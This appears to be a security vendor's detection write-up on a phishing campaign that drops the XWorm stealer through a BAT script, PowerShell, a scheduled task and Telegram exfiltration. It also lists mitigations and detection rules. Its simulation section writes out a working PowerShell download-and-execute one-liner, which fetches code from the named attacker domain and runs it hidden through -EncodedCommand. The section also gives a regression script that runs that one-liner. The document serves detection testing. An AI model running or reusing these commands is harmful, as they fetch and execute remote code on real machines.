Malicious Script Delivering More Maliciousness
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A phishing email delivers a malicious attachment containing a BAT script that launches PowerShell to pull down a Base64-encoded payload. After decoding, the payload resolves to XWorm, a .NET stealer that fingerprints the host and exfiltrates collected data through a Telegram bot. Persistence is established by creating a scheduled task that repeatedly runs the dropped executable. The operation relies on multiple infrastructure elements, including a fake image-hosting lure and at least one compromised IP used for payload staging.
Investigation
Review of the BAT script exposed a PowerShell one-liner that retrieves a PNG-looking file from an attacker-controlled domain. The embedded Base64 content is then sanitized, reversed, and decoded to reconstruct the .NET executable. Binary analysis showed the malware registers a scheduled task named Chromiumx2 and uses Telegram’s API for command-and-control and data exfiltration. Investigators extracted key network indicators, including the hosting domain, associated IP address, and the Telegram API endpoint referenced during execution.
Mitigation
Prevent execution of untrusted BAT and PowerShell content originating from email attachments or user download directories. Apply application allow-listing to restrict scheduled task creation and flag suspicious new task registrations. Monitor and, where feasible, restrict outbound access to Telegram API endpoints and block the identified malicious domains at DNS/proxy layers. Keep endpoint detections updated with newly observed indicators and script-based download patterns.
Response
Isolate endpoints where the Chromiumx2 scheduled task or Chromiumx2.exe is observed. Remove the scheduled task, delete the malicious binary, and collect artifacts (script, decoded payload, task XML, and relevant logs) for forensic scoping. Hunt across the environment for the same task name, similar PowerShell decode behavior, and Telegram-driven traffic. Reset potentially exposed credentials and notify users about the phishing attachment to reduce repeat execution.
Attack Flow
Detections
Possible Telegram Abuse As Command And Control Channel (via dns_query)
View
Suspicious Process Utilizes a URL in the Command Line (via cmdline)
View
Download or Upload via Powershell (via cmdline)
View
Schtasks Points to Suspicious Directory / Binary / Script (via cmdline)
View
Suspicious Powershell Strings (via powershell)
View
Suspicious Files in Public User Profile (via file_event)
View
Suspicious Powershell Strings (via cmdline)
View
Possible Schtasks or AT Usage for Persistence (via cmdline)
View
IOCs (SourceIP) to detect: Malicious Script Delivering More Maliciousness
View
IOCs (DestinationIP) to detect: Malicious Script Delivering More Maliciousness
View
Scheduled Task Creation for Chromiumx2 Persistence [Windows Process Creation]
View
Detect Base64-Encoded PowerShell Payload Fetch [Windows Powershell]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
-
Attack Narrative & Commands:
The attacker wants to download and execute a malicious payload from a compromised web server. To evade classic signature detection, they embed the entire download‑and‑execute logic in a single Base64 string and invoke PowerShell with-EncodedCommand. The command references the exact URL that the detection rule monitors (https://uniworldrivercruises-co.uk/optimized_MSI.png).-
Encode the malicious payload (a simple downloader that runs the received script):
$payload = "IEX (New-Object Net.WebClient).DownloadString('https://uniworldrivercruises-co.uk/optimized_MSI.png')" $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload)) Write-Host $b64Resulting B64 (example):
SQBFAFgAIABpAG4AIABOAGUAdwAtAE8AbgB0AGkAYwBzACA...(truncated). -
Execute the encoded command:
powershell -EncodedCommand SQBFAFgAIABpAG4AIABOAGUAdwAtAE8AbgB0AGkAYwBzACA...
This single line generates the exact telemetry the Sigma rule expects: a PowerShell process, the
-EncodedCommandflag, and the malicious URL inside the decoded script block. -
-
Regression Test Script:
#------------------------------------------------- # Regression script to trigger the detection rule #------------------------------------------------- # 1. Build the malicious payload $payload = "IEX (New-Object Net.WebClient).DownloadString('https://uniworldrivercruises-co.uk/optimized_MSI.png')" $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload)) # 2. Execute the payload via an encoded PowerShell command Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -EncodedCommand $b64" ` -WindowStyle Hidden -PassThru | Out-Null Write-Host "Malicious encoded command executed." #------------------------------------------------- -
Cleanup Commands:
# Remove any transient files (none expected because the payload streams directly) # Terminate any lingering hidden PowerShell processes started by the test Get-Process -Name "powershell" -ErrorAction SilentlyContinue | Where-Object {$_.StartInfo.Arguments -match "-EncodedCommand"} | Stop-Process -Force Write-Host "Cleanup complete."